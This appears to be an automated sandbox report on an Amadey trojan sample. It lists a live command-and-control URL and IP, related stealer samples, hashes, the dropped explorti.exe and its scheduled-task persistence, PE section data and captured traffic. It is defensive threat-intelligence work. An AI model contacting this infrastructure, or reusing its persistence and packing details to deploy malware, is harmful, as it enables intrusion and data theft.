http://185.215.113.19/Vi9leo/index.php#f	explorti.exe, 00000007.00000002.2891529475.00000000011BB000.00000004.00000020.00020000.00000000.sdmp	false	2%, Virustotal, Browse Avira URL Cloud: phishing	unknown
http://185.215.113.19/Vi9leo/index.php#	explorti.exe, 00000007.00000002.2891529475.000000000122A000.00000004.00000020.00020000.00000000.sdmp	false	2%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://185.215.113.19/Vi9leo/index.php0x	explorti.exe, 00000007.00000002.2891529475.00000000011BB000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.215.113.19/Vi9leo/index.phpPy;	explorti.exe, 00000007.00000002.2891529475.00000000011BB000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.215.113.19/Vi9leo/index.phpoft	explorti.exe, 00000007.00000002.2891529475.00000000011BB000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.215.113.19/Vi9leo/index.phpk	explorti.exe, 00000007.00000002.2891529475.000000000122A000.00000004.00000020.00020000.00000000.sdmp	false	19%, Virustotal, Browse Avira URL Cloud: phishing	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
185.215.113.19	unknown	Portugal		206894	WHOLESALECONNECTIONSNL	true

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1483380
Start date and time:	2024-07-27 06:32:04 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 6m 24s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	9
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	f3wrBtIYXx.exe renamed because original name is a hash value
Original Sample Name:	f06dc6079b508f90f845063c8fd658a8.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@5/3@0/1
EGA Information:	Successful, ratio: 25%
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target explorti.exe, PID 7236 because there are no executed function
Execution Graph export aborted for target explorti.exe, PID 7348 because there are no executed function
Execution Graph export aborted for target f3wrBtIYXx.exe, PID 6644 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
00:34:02	API Interceptor	869x Sleep call for process: explorti.exe modified
05:32:55	Task Scheduler	Run new task: explorti path: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
185.215.113.19	8NjcvPNvUr.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	185.215.113.19/Vi9leo/index.php
	11NdzR12PS.exe	Get hash	malicious	Amadey	Browse	185.215.113.19/Vi9leo/index.php
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	185.215.113.19/Vi9leo/index.php
	setup.exe	Get hash	malicious	Amadey	Browse	185.215.113.19/Vi9leo/index.php
	setup.exe	Get hash	malicious	Amadey	Browse	185.215.113.19/Vi9leo/index.php
	setup.exe	Get hash	malicious	Amadey	Browse	185.215.113.19/Vi9leo/index.php
	file.exe	Get hash	malicious	Amadey, Babadeda, Stealc, Vidar	Browse	185.215.113.19/Vi9leo/index.php
	file.exe	Get hash	malicious	Amadey, Babadeda, RedLine, Stealc, Vidar	Browse	185.215.113.19/Vi9leo/index.php
	6SoKuOqyNh.exe	Get hash	malicious	Amadey, Babadeda, Stealc, Vidar	Browse	185.215.113.19/Vi9leo/index.php
	SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	Get hash	malicious	Amadey	Browse	185.215.113.19/Vi9leo/index.php

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
WHOLESALECONNECTIONSNL	8NjcvPNvUr.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	185.215.113.16
	11NdzR12PS.exe	Get hash	malicious	Amadey	Browse	185.215.113.19
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	185.215.113.16
	file.exe	Get hash	malicious	Python Stealer, Amadey, Monster Stealer, RedLine, Stealc, Vidar	Browse	185.215.113.16
	setup.exe	Get hash	malicious	Amadey	Browse	185.215.113.19
	setup.exe	Get hash	malicious	Amadey	Browse	185.215.113.16
	setup.exe	Get hash	malicious	Amadey	Browse	185.215.113.19
	setup.exe	Get hash	malicious	Amadey	Browse	185.215.113.16
	setup.exe	Get hash	malicious	Amadey, SmokeLoader	Browse	185.215.113.16
	setup.exe	Get hash	malicious	Amadey	Browse	185.215.113.19

Process:	C:\Users\user\Desktop\f3wrBtIYXx.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1892864
Entropy (8bit):	7.947759411161351
Encrypted:	false
SSDEEP:	49152:TPJTk8xFJk/RAfsurwDCCiUrqan/PoXiq22Qb8akban:dpzJ6UD3ClqXToDk+n
MD5:	F06DC6079B508F90F845063C8FD658A8
SHA1:	7D1ED8B27D94912F67117BF4E4E17D971389FC16
SHA-256:	7D05AE98FEA42630B199A45F26E18A7196A8F3509ED703FC918416780FD1F661
SHA-512:	095265C11ACEB62FB8C5314E06C86C680B19577DFB61E79220B599BD52C35F58750AC06FA8B94519AEE4BDBC259C0BF87494B86D79FCA384C4EC3C2C7FF8521A
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Virustotal, Detection: 55%, Browse
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........PJ.r>..r>..r>...=..r>...;.(r>.].:..r>.].=..r>.].;..r>...:..r>...?..r>..r?.^r>...7..r>......r>...<..r>.Rich.r>.................PE..L....A.f............................. K...........@..........................PK.....X7....@.................................W...k.............................K.............................d.K..................................................... . ............................@....rsrc...............................@....idata ............................@... ..*.........................@...bzkmssua.....@1.....................@...sxdezqxh......K.....................@....taggant.0... K.."..................@...........................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\f3wrBtIYXx.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Reputation:	high, very likely benign file
Preview:	[ZoneTransfer]....ZoneId=0

C:\Windows\Tasks\explorti.job

Download File

Process:	C:\Users\user\Desktop\f3wrBtIYXx.exe
File Type:	data
Category:	dropped
Size (bytes):	288
Entropy (8bit):	3.409325052504102
Encrypted:	false
SSDEEP:	6:vn2zX4RKUEZ+lX1cI1l6lm6tPjgsW2YRZuy0l1yut0:/04RKQ1cag7jzvYRQV17t0
MD5:	9158DB5020A73DD233F5553FA508DDB2
SHA1:	45626824F740374417E01DCF82BEC6DF68D7830E
SHA-256:	AE82E5527C296351017D4DED063C39D17AB79E052369F8F5BA35143570C06F72
SHA-512:	769CF481E665882931BC0330180D24F4C869AE3D1083F52D44BC04EE99E3B17F177CD4F5B74F3BC73DFA826C9120B2C098866768EF70BD2C8AFC1FC13C066D99
Malicious:	false
Reputation:	low
Preview:	........U./D...[K1X.F.......<... .....s.......... ....................:.C.:.\.U.s.e.r.s.\.j.o.n.e.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.0.d.8.f.5.e.b.8.a.7.\.e.x.p.l.o.r.t.i...e.x.e.........J.O.N.E.S.-.P.C.\.j.o.n.e.s...................0.................!.@3P.........................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.947759411161351
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	f3wrBtIYXx.exe
File size:	1'892'864 bytes
MD5:	f06dc6079b508f90f845063c8fd658a8
SHA1:	7d1ed8b27d94912f67117bf4e4e17d971389fc16
SHA256:	7d05ae98fea42630b199a45f26e18a7196a8f3509ed703fc918416780fd1f661
SHA512:	095265c11aceb62fb8c5314e06c86c680b19577dfb61e79220b599bd52c35f58750ac06fa8b94519aee4bdbc259c0bf87494b86d79fca384c4ec3c2c7ff8521a
SSDEEP:	49152:TPJTk8xFJk/RAfsurwDCCiUrqan/PoXiq22Qb8akban:dpzJ6UD3ClqXToDk+n
TLSH:	10953380E29975DEC5CCBB3AC5B867545E97235A083F21A4790273872710F7C7F1A8EA
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........PJ.r>..r>..r>...=..r>...;.(r>.].:..r>.].=..r>.].;..r>...:..r>...?..r>..r?.^r>...7..r>......r>...<..r>.Rich.r>................

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0x8b2000
Entrypoint Section:	.taggant
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x66A24110 [Thu Jul 25 12:12:00 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	2eabe9054cad5152567f0699947a2c5b

Entrypoint Preview

Instruction
jmp 00007F5F64BECD2Ah
xadd byte ptr [eax+eax], bl
add byte ptr [eax], al
add byte ptr [eax], al
jmp 00007F5F64BEED25h
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x6a057	0x6b	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x69000	0x1e0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x4b06b4	0x10	bzkmssua
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x4b0664	0x18	bzkmssua
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
	0x1000	0x68000	0x2dc00	6fee8b9eb4a4714b1a601cbac3540a0d	False	1.0	data	7.988249586345587	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x69000	0x1e0	0x200	73166b6bdf381f09dea2cede8868cc77	False	0.578125	data	4.566766358338502	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0x6a000	0x1000	0x200	cc76e3822efdc911f469a3e3cc9ce9fe	False	0.1484375	data	1.0428145631430756	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
	0x6b000	0x2a9000	0x200	3f64355cb47d475aef49a356d08c73fd	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
bzkmssua	0x314000	0x19d000	0x19ca00	6f5544cc31fa4ba2c34d55a139318ef2	False	0.9941347082323538	data	7.9539160203429615	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
sxdezqxh	0x4b1000	0x1000	0x400	babd675b9c455d5bd654fbfb7ed82a63	False	0.810546875	data	6.349153432660375	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant	0x4b2000	0x3000	0x2200	c09980f151b11ef9467eae74c12d6914	False	0.00666360294117647	DOS executable (COM)	0.019571456231530684	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_MANIFEST	0x4b06c4	0x17d	XML 1.0 document, ASCII text, with CRLF line terminators	English	United States	0.5931758530183727

Imports

DLL	Import
kernel32.dll	lstrcpy

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	Protocol	SID	Signature	Source Port	Dest Port	Source IP	Dest IP
2024-07-27T06:34:05.609941+0200	TCP	2856147	ETPRO MALWARE Amadey CnC Activity M3	62233	80	192.168.2.4	185.215.113.19
2024-07-27T06:33:13.582805+0200	TCP	2022930	ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow	443	49730	40.68.123.157	192.168.2.4
2024-07-27T06:34:04.461610+0200	TCP	2856147	ETPRO MALWARE Amadey CnC Activity M3	62232	80	192.168.2.4	185.215.113.19
2024-07-27T06:34:06.722484+0200	TCP	2856147	ETPRO MALWARE Amadey CnC Activity M3	62234	80	192.168.2.4	185.215.113.19
2024-07-27T06:33:53.339046+0200	TCP	2022930	ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow	443	62231	40.68.123.157	192.168.2.4

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 27, 2024 06:34:03.695530891 CEST	62232	80	192.168.2.4	185.215.113.19
Jul 27, 2024 06:34:03.701165915 CEST	80	62232	185.215.113.19	192.168.2.4
Jul 27, 2024 06:34:03.701273918 CEST	62232	80	192.168.2.4	185.215.113.19
Jul 27, 2024 06:34:03.701400042 CEST	62232	80	192.168.2.4	185.215.113.19
Jul 27, 2024 06:34:03.706490993 CEST	80	62232	185.215.113.19	192.168.2.4
Jul 27, 2024 06:34:04.459923983 CEST	80	62232	185.215.113.19	192.168.2.4
Jul 27, 2024 06:34:04.461610079 CEST	62232	80	192.168.2.4	185.215.113.19
Jul 27, 2024 06:34:04.464155912 CEST	62232	80	192.168.2.4	185.215.113.19
Jul 27, 2024 06:34:04.469388962 CEST	80	62232	185.215.113.19	192.168.2.4
Jul 27, 2024 06:34:04.715233088 CEST	80	62232	185.215.113.19	192.168.2.4
Jul 27, 2024 06:34:04.717663050 CEST	62232	80	192.168.2.4	185.215.113.19
Jul 27, 2024 06:34:04.823338032 CEST	62232	80	192.168.2.4	185.215.113.19
Jul 27, 2024 06:34:04.823466063 CEST	62233	80	192.168.2.4	185.215.113.19
Jul 27, 2024 06:34:04.828653097 CEST	80	62233	185.215.113.19	192.168.2.4
Jul 27, 2024 06:34:04.828953981 CEST	80	62232	185.215.113.19	192.168.2.4
Jul 27, 2024 06:34:04.829060078 CEST	62233	80	192.168.2.4	185.215.113.19
Jul 27, 2024 06:34:04.829061985 CEST	62232	80	192.168.2.4	185.215.113.19
Jul 27, 2024 06:34:04.829284906 CEST	62233	80	192.168.2.4	185.215.113.19
Jul 27, 2024 06:34:04.834414959 CEST	80	62233	185.215.113.19	192.168.2.4
Jul 27, 2024 06:34:05.609453917 CEST	80	62233	185.215.113.19	192.168.2.4
Jul 27, 2024 06:34:05.609941006 CEST	62233	80	192.168.2.4	185.215.113.19
Jul 27, 2024 06:34:05.610826969 CEST	62233	80	192.168.2.4	185.215.113.19
Jul 27, 2024 06:34:05.615938902 CEST	80	62233	185.215.113.19	192.168.2.4
Jul 27, 2024 06:34:05.862864971 CEST	80	62233	185.215.113.19	192.168.2.4
Jul 27, 2024 06:34:05.863281012 CEST	62233	80	192.168.2.4	185.215.113.19
Jul 27, 2024 06:34:05.979185104 CEST	62233	80	192.168.2.4	185.215.113.19
Jul 27, 2024 06:34:05.979579926 CEST	62234	80	192.168.2.4	185.215.113.19
Jul 27, 2024 06:34:05.984916925 CEST	80	62234	185.215.113.19	192.168.2.4
Jul 27, 2024 06:34:05.984961033 CEST	80	62233	185.215.113.19	192.168.2.4
Jul 27, 2024 06:34:05.985024929 CEST	62234	80	192.168.2.4	185.215.113.19
Jul 27, 2024 06:34:05.985049963 CEST	62233	80	192.168.2.4	185.215.113.19
Jul 27, 2024 06:34:05.985200882 CEST	62234	80	192.168.2.4	185.215.113.19
Jul 27, 2024 06:34:05.990010023 CEST	80	62234	185.215.113.19	192.168.2.4
Jul 27, 2024 06:34:06.722413063 CEST	80	62234	185.215.113.19	192.168.2.4
Jul 27, 2024 06:34:06.722484112 CEST	62234	80	192.168.2.4	185.215.113.19
Jul 27, 2024 06:34:06.723232985 CEST	62234	80	192.168.2.4	185.215.113.19
Jul 27, 2024 06:34:06.728245974 CEST	80	62234	185.215.113.19	192.168.2.4
Jul 27, 2024 06:34:06.968635082 CEST	80	62234	185.215.113.19	192.168.2.4
Jul 27, 2024 06:34:06.968760014 CEST	62234	80	192.168.2.4	185.215.113.19
Jul 27, 2024 06:34:07.073268890 CEST	62234	80	192.168.2.4	185.215.113.19
Jul 27, 2024 06:34:07.073549986 CEST	62235	80	192.168.2.4	185.215.113.19
Jul 27, 2024 06:34:07.078795910 CEST	80	62235	185.215.113.19	192.168.2.4
Jul 27, 2024 06:34:07.078893900 CEST	62235	80	192.168.2.4	185.215.113.19
Jul 27, 2024 06:34:07.079056978 CEST	62235	80	192.168.2.4	185.215.113.19
Jul 27, 2024 06:34:07.079083920 CEST	80	62234	185.215.113.19	192.168.2.4
Jul 27, 2024 06:34:07.079148054 CEST	62234	80	192.168.2.4	185.215.113.19
Jul 27, 2024 06:34:07.084074974 CEST	80	62235	185.215.113.19	192.168.2.4
Jul 27, 2024 06:34:07.828514099 CEST	80	62235	185.215.113.19	192.168.2.4
Jul 27, 2024 06:34:07.828727961 CEST	62235	80	192.168.2.4	185.215.113.19
Jul 27, 2024 06:34:07.829538107 CEST	62235	80	192.168.2.4	185.215.113.19
Jul 27, 2024 06:34:07.834669113 CEST	80	62235	185.215.113.19	192.168.2.4
Jul 27, 2024 06:34:08.077671051 CEST	80	62235	185.215.113.19	192.168.2.4
Jul 27, 2024 06:34:08.077815056 CEST	62235	80	192.168.2.4	185.215.113.19
Jul 27, 2024 06:34:08.182672024 CEST	62235	80	192.168.2.4	185.215.113.19
Jul 27, 2024 06:34:08.183141947 CEST	62236	80	192.168.2.4	185.215.113.19
Jul 27, 2024 06:34:08.187874079 CEST	80	62235	185.215.113.19	192.168.2.4
Jul 27, 2024 06:34:08.188083887 CEST	62235	80	192.168.2.4	185.215.113.19
Jul 27, 2024 06:34:08.189120054 CEST	80	62236	185.215.113.19	192.168.2.4
Jul 27, 2024 06:34:08.189295053 CEST	62236	80	192.168.2.4	185.215.113.19
Jul 27, 2024 06:34:08.189399958 CEST	62236	80	192.168.2.4	185.215.113.19
Jul 27, 2024 06:34:08.194232941 CEST	80	62236	185.215.113.19	192.168.2.4
Jul 27, 2024 06:34:09.146491051 CEST	80	62236	185.215.113.19	192.168.2.4
Jul 27, 2024 06:34:09.147070885 CEST	62236	80	192.168.2.4	185.215.113.19
Jul 27, 2024 06:34:09.147638083 CEST	62236	80	192.168.2.4	185.215.113.19
Jul 27, 2024 06:34:09.153047085 CEST	80	62236	185.215.113.19	192.168.2.4
Jul 27, 2024 06:34:09.402754068 CEST	80	62236	185.215.113.19	192.168.2.4
Jul 27, 2024 06:34:09.402838945 CEST	62236	80	192.168.2.4	185.215.113.19
Jul 27, 2024 06:34:09.510368109 CEST	62236	80	192.168.2.4	185.215.113.19
Jul 27, 2024 06:34:09.510664940 CEST	62237	80	192.168.2.4	185.215.113.19
Jul 27, 2024 06:34:09.515691042 CEST	80	62237	185.215.113.19	192.168.2.4
Jul 27, 2024 06:34:09.515785933 CEST	62237	80	192.168.2.4	185.215.113.19
Jul 27, 2024 06:34:09.515912056 CEST	62237	80	192.168.2.4	185.215.113.19
Jul 27, 2024 06:34:09.515952110 CEST	80	62236	185.215.113.19	192.168.2.4
Jul 27, 2024 06:34:09.516007900 CEST	62236	80	192.168.2.4	185.215.113.19
Jul 27, 2024 06:34:09.521143913 CEST	80	62237	185.215.113.19	192.168.2.4
Jul 27, 2024 06:34:10.651735067 CEST	80	62237	185.215.113.19	192.168.2.4
Jul 27, 2024 06:34:10.651947021 CEST	62237	80	192.168.2.4	185.215.113.19
Jul 27, 2024 06:34:10.652134895 CEST	80	62237	185.215.113.19	192.168.2.4
Jul 27, 2024 06:34:10.652198076 CEST	62237	80	192.168.2.4	185.215.113.19
Jul 27, 2024 06:34:10.652352095 CEST	62237	80	192.168.2.4	185.215.113.19
Jul 27, 2024 06:34:10.852658033 CEST	80	62237	185.215.113.19	192.168.2.4
Jul 27, 2024 06:34:10.852870941 CEST	62237	80	192.168.2.4	185.215.113.19
Jul 27, 2024 06:34:10.853688955 CEST	80	62237	185.215.113.19	192.168.2.4
Jul 27, 2024 06:34:11.098033905 CEST	80	62237	185.215.113.19	192.168.2.4
Jul 27, 2024 06:34:11.098378897 CEST	62237	80	192.168.2.4	185.215.113.19
Jul 27, 2024 06:34:11.213835001 CEST	62237	80	192.168.2.4	185.215.113.19
Jul 27, 2024 06:34:11.214147091 CEST	62238	80	192.168.2.4	185.215.113.19
Jul 27, 2024 06:34:11.222012043 CEST	80	62238	185.215.113.19	192.168.2.4
Jul 27, 2024 06:34:11.222222090 CEST	62238	80	192.168.2.4	185.215.113.19
Jul 27, 2024 06:34:11.222361088 CEST	62238	80	192.168.2.4	185.215.113.19
Jul 27, 2024 06:34:11.222559929 CEST	80	62237	185.215.113.19	192.168.2.4
Jul 27, 2024 06:34:11.222621918 CEST	62237	80	192.168.2.4	185.215.113.19
Jul 27, 2024 06:34:11.227823019 CEST	80	62238	185.215.113.19	192.168.2.4
Jul 27, 2024 06:34:11.961165905 CEST	80	62238	185.215.113.19	192.168.2.4
Jul 27, 2024 06:34:11.961399078 CEST	62238	80	192.168.2.4	185.215.113.19
Jul 27, 2024 06:34:11.961966991 CEST	62238	80	192.168.2.4	185.215.113.19
Jul 27, 2024 06:34:11.967200041 CEST	80	62238	185.215.113.19	192.168.2.4
Jul 27, 2024 06:34:12.206079006 CEST	80	62238	185.215.113.19	192.168.2.4
Jul 27, 2024 06:34:12.206521034 CEST	62238	80	192.168.2.4	185.215.113.19
Jul 27, 2024 06:34:12.313899040 CEST	62238	80	192.168.2.4	185.215.113.19
Jul 27, 2024 06:34:12.314045906 CEST	62239	80	192.168.2.4	185.215.113.19
Jul 27, 2024 06:34:12.319390059 CEST	80	62239	185.215.113.19	192.168.2.4
Jul 27, 2024 06:34:12.319473982 CEST	62239	80	192.168.2.4	185.215.113.19
Jul 27, 2024 06:34:12.319616079 CEST	80	62238	185.215.113.19	192.168.2.4
Jul 27, 2024 06:34:12.319660902 CEST	62239	80	192.168.2.4	185.215.113.19
Jul 27, 2024 06:34:12.319978952 CEST	62238	80	192.168.2.4	185.215.113.19
Jul 27, 2024 06:34:12.324925900 CEST	80	62239	185.215.113.19	192.168.2.4
Jul 27, 2024 06:34:13.073952913 CEST	80	62239	185.215.113.19	192.168.2.4
Jul 27, 2024 06:34:13.074012995 CEST	62239	80	192.168.2.4	185.215.113.19
Jul 27, 2024 06:34:13.074616909 CEST	62239	80	192.168.2.4	185.215.113.19
Jul 27, 2024 06:34:13.080249071 CEST	80	62239	185.215.113.19	192.168.2.4
Jul 27, 2024 06:34:13.321502924 CEST	80	62239	185.215.113.19	192.168.2.4
Jul 27, 2024 06:34:13.321773052 CEST	62239	80	192.168.2.4	185.215.113.19
Jul 27, 2024 06:34:13.432322025 CEST	62239	80	192.168.2.4	185.215.113.19
Jul 27, 2024 06:34:13.432550907 CEST	62240	80	192.168.2.4	185.215.113.19
Jul 27, 2024 06:34:13.437935114 CEST	80	62240	185.215.113.19	192.168.2.4
Jul 27, 2024 06:34:13.438020945 CEST	80	62239	185.215.113.19	192.168.2.4
Jul 27, 2024 06:34:13.438076019 CEST	62239	80	192.168.2.4	185.215.113.19
Jul 27, 2024 06:34:13.438179970 CEST	62240	80	192.168.2.4	185.215.113.19
Jul 27, 2024 06:34:13.438275099 CEST	62240	80	192.168.2.4	185.215.113.19
Jul 27, 2024 06:34:13.443309069 CEST	80	62240	185.215.113.19	192.168.2.4
Jul 27, 2024 06:34:14.181307077 CEST	80	62240	185.215.113.19	192.168.2.4
Jul 27, 2024 06:34:14.181410074 CEST	62240	80	192.168.2.4	185.215.113.19
Jul 27, 2024 06:34:14.181981087 CEST	62240	80	192.168.2.4	185.215.113.19
Jul 27, 2024 06:34:14.186796904 CEST	80	62240	185.215.113.19	192.168.2.4
Jul 27, 2024 06:34:14.428961039 CEST	80	62240	185.215.113.19	192.168.2.4
Jul 27, 2024 06:34:14.429476976 CEST	62240	80	192.168.2.4	185.215.113.19
Jul 27, 2024 06:34:14.541726112 CEST	62240	80	192.168.2.4	185.215.113.19
Jul 27, 2024 06:34:14.542186975 CEST	62241	80	192.168.2.4	185.215.113.19
Jul 27, 2024 06:34:14.547121048 CEST	80	62241	185.215.113.19	192.168.2.4
Jul 27, 2024 06:34:14.547187090 CEST	80	62240	185.215.113.19	192.168.2.4
Jul 27, 2024 06:34:14.547200918 CEST	62241	80	192.168.2.4	185.215.113.19
Jul 27, 2024 06:34:14.547244072 CEST	62240	80	192.168.2.4	185.215.113.19
